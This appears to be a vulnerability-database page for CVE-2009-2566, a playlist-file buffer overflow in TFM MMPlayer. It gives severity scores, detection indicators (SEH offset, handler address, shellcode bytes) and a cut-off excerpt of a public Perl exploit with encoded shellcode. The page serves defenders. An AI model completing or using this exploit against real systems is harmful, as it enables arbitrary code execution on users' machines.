CVE-2009-2566
published 2009-07-21CVE-2009-2566: Stack-based buffer overflow in TFM MMPlayer 2.0, and possibly 2.0.0.30, allows remote attackers to execute arbitrary code via a long string in a playlist…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.07%
98.0th percentile
Stack-based buffer overflow in TFM MMPlayer 2.0, and possibly 2.0.0.30, allows remote attackers to execute arbitrary code via a long string in a playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tfm | mmplayer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xEB\xED\x41\x42
bytes↗
\xB4\x28\x40\x00
bytes↗
\xE9\x03\xF0\xFF\xFF
- →The exploit triggers via a malformed .m3u or .ppl playlist file containing an overly long string; monitor file-open events for MMPlayer processing .m3u/.ppl files with anomalously large content. ↗
- →The exploit payload is 4088+ bytes prepended with the marker string 'D_Z' before the shellcode; presence of this pattern in a .m3u/.ppl file is a strong indicator of exploitation. ↗
- →SEH overwrite at offset 4088 (minus shellcode length) with a hardcoded SEH handler address 0x004028B4; look for SEH chain corruption in MMPlayer process memory pointing to this address. ↗
- →The exploit uses a PexAlphaNum-encoded win32_exec shellcode (343 bytes) with EXITFUNC=seh; alphanumeric shellcode in a playlist file is anomalous and detectable via content inspection. ↗
- ·The hardcoded SEH handler address (0x004028B4) is specific to TFM MMPlayer 2.0 on Windows XP Pro SP2 (Fr); this address will differ on other versions or service packs. ↗
- ·The Metasploit module targets MMPlayer 2.2, while the NVD advisory references versions 2.0 and possibly 2.0.0.30; the exact vulnerable version range should be confirmed before deploying detections scoped to a specific version. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)
exploitdb·2009-06-30
CVE-2009-2566 TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)
TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)
#[+] Author : ThE g0bL!N
# # Greetz to all my friends
## Tested on: Windows XP Pro SP2 (Fr)
# Big Thnx :His0k4
#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\
Metasploit
TFM MMPlayer (m3u/ppl File) Buffer Overflow
metasploit
TFM MMPlayer (m3u/ppl File) Buffer Overflow
TFM MMPlayer (m3u/ppl File) Buffer Overflow
This module exploits a buffer overflow in MMPlayer 2.2 The vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string, which results in overwriting a SEH record, thus allowing arbitrary code execution under the context of the user.
No writeups or analysis indexed.
2009-07-21
Published